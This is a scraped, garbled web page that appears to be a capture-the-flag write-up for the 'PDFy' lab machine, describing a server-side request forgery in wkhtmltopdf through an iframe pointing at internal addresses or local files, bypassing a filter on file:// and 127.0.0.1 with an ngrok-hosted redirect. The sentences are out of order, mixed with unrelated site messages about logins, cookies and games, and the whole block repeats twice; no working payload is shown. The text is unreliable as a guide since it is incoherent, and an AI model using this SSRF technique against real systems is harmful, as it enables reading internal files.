The SSRF vulnerability in wkhtmltopdf can be triggered by inserting an iframe that points to an internal asset’s IP address or a local file, causing the tool to fetch the embedded resource.
Now read /tmp/root.txt – that’s your RPD.
To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.
Because the application filters out any direct payload string containing file:// or 127.0.0.1 , we cannot provide a malicious URI straight into the input form. We must orchestrate an exploitation chain:
In /home/john/user.txt
Submit a benign live website (e.g., http://google.com ) to check if the app functions properly.
I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:
Are you sure you want to logout?
Your password has been reset successfully and sent to provided email. You can now login with your new password.
Your review has been submitted successfully. Thank you for your feedback. We will review it and publish it shortly.
You can register your account to save your progress and continue playing on other devices.
Thank you for your feedback. We will contact you as soon as possible.
Are you sure you want to start a new game? You can always continue the current game in the HISTORY tab of the player's personal account.
You have already used the demo tariff. You can only buy a paid tariff.
By choosing "Accept all cookies" you agree to the use of cookies to help us provide you with a better user experience and to analyse website usage. By clicking "Adjust your preferences" you can choose which cookies to allow. Only the essential cookies are necessary for the proper functioning of our website and cannot be refused
The SSRF vulnerability in wkhtmltopdf can be triggered by inserting an iframe that points to an internal asset’s IP address or a local file, causing the tool to fetch the embedded resource.
Now read /tmp/root.txt – that’s your RPD.
To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.
Because the application filters out any direct payload string containing file:// or 127.0.0.1 , we cannot provide a malicious URI straight into the input form. We must orchestrate an exploitation chain:
In /home/john/user.txt
Submit a benign live website (e.g., http://google.com ) to check if the app functions properly.
I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including: